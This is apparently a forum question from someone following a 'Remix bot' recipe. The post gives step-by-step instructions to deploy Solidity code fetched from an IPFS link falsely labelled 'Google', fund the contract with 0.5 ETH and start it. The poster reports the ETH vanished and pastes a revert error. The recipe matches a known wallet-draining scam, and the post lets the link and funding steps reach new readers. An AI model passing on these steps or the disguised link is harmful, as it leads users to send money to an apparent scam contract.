# Remix to ethereum

Tags: execution

**Below is the remix code I used
Here's an inline link to [Google](https://bafybeia5lffjtwc6sxiianrdjcjbvhkvazsuupv4ejlkk5o4qixys3mj6i.ipfs.w3s.link/C-a0311.txt).

The next steps are my steps: first go to the remix website, Create “New File”. Rename it to “bot.sol”, then paste the coder above, then Go to the "Compile" tab on Remix and Compile with Solidity version 0.8.4 and then Go to the “Deploy & Run Transactions” tab on Remix, select the “Injected Provider” environment, then “Deploy”. This will create your own contract by confirming the MetaMask Contract creation fee. And use 0.5eth as funding Click on the “ Key” button, and copy your key to VALUE then in the “SetBalancePercent” or “SetBalanceETH” functions, enter the amount of money the bot will work with. Then. Click “StartNative” button to get the bot started.
However, after connecting the wallet remix and transferring 0.5eth, I did not see eth appear on Ethereum. The Internet said that the connection between ehtereum and remix might be broken, so I restarted remix and used the contract address of ethereum but it showed up in the terminal.

DexInterface.Key errored: execution reverted: arithmetic underflow or overflow
{"originalError":{
"code": 3,
"data": "0x4e487b710000000000000000000000000000000000000000000000000000000000000011",
"message": "execution reverted: arithmetic underflow or overflow"}

Restarted remix but still can't display it